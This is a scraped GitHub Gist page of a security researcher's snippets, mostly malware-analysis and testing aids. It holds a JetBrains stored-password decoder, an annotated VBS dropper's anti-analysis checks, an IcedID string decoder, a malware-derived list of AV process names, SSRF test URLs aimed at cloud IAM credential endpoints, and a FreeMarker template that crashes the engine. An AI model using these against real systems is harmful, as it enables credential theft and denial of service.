Skip to content

Instantly share code, notes, and snippets.

Avatar
🇨🇿
Czeching out your git secrets 🙃

Dylan Katz Plazmaz

🇨🇿
Czeching out your git secrets 🙃
View GitHub Profile
View config.yml
notify:
- type: email
properties:
host: ""
host_user: ""
host_pass: ""
port: 587
use_tls: True
from: ""
enabled: false
@Plazmaz
Plazmaz / jetbrains_encoding.py
Created Nov 7, 2019
This is what JetBrains uses(used?) for encoding webServers.xml and other configs
View jetbrains_encoding.py
# Source file:
# http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD
# PasswordUtil.decodePassword
def decode_jebtrains(encoded):
out = ''
for i in range(0, len(encoded), 4):
out += chr(int(encoded[i:i+4], 16) ^ 57258)
return out
# PasswordUtil.encodePassword
@Plazmaz
Plazmaz / annotated-vbs-dropper.vbs
Last active Oct 17, 2019
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
View annotated-vbs-dropper.vbs
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB
@Plazmaz
Plazmaz / decode.vbs
Last active Oct 17, 2019
A tool for decoding IcedID arrays
View decode.vbs
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
@Plazmaz
Plazmaz / list.txt
Created Sep 29, 2019
A list of debugging/AV/developer tools extracted from malware
View list.txt
cis.exe
cmdvirth.exe
alive.exe
filewatcherservice.exe
ngvmsvc.exe
sandboxierpcss.exe
analyzer.exe
fortitracer.exe
nsverctl.exe
sbiectrl.exe
View keybase.md

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo

To claim this, I am signing this object:

@Plazmaz
Plazmaz / 2019-05-06-example-post.md
Last active Jun 25, 2019
Jekyll Metadata Generator
View 2019-05-06-example-post.md

This Is a Post Title!

This is an example post. I really like this post because it is fake and that's cool.

@Plazmaz
Plazmaz / arya-list.md
Last active May 30, 2019
Arya Stark's Kill List (From the Show)
View arya-list.md

Spoilers?

  • Joffrey
  • Cersei
  • Wolder Frey
  • Meryn Trant
  • Tywin Lannister
  • The Red Woman
  • Beric Dondarrion (Removed before death)
  • Thoros of Myr
  • Ilyn Payne
@Plazmaz
Plazmaz / cloud_metadata.txt
Last active Jul 14, 2018 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Plazmaz
Plazmaz / freemarker-billion.ftl
Last active Nov 20, 2019
FreeMarker Billion Laughs
View freemarker-billion.ftl
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
You can’t perform that action at this time.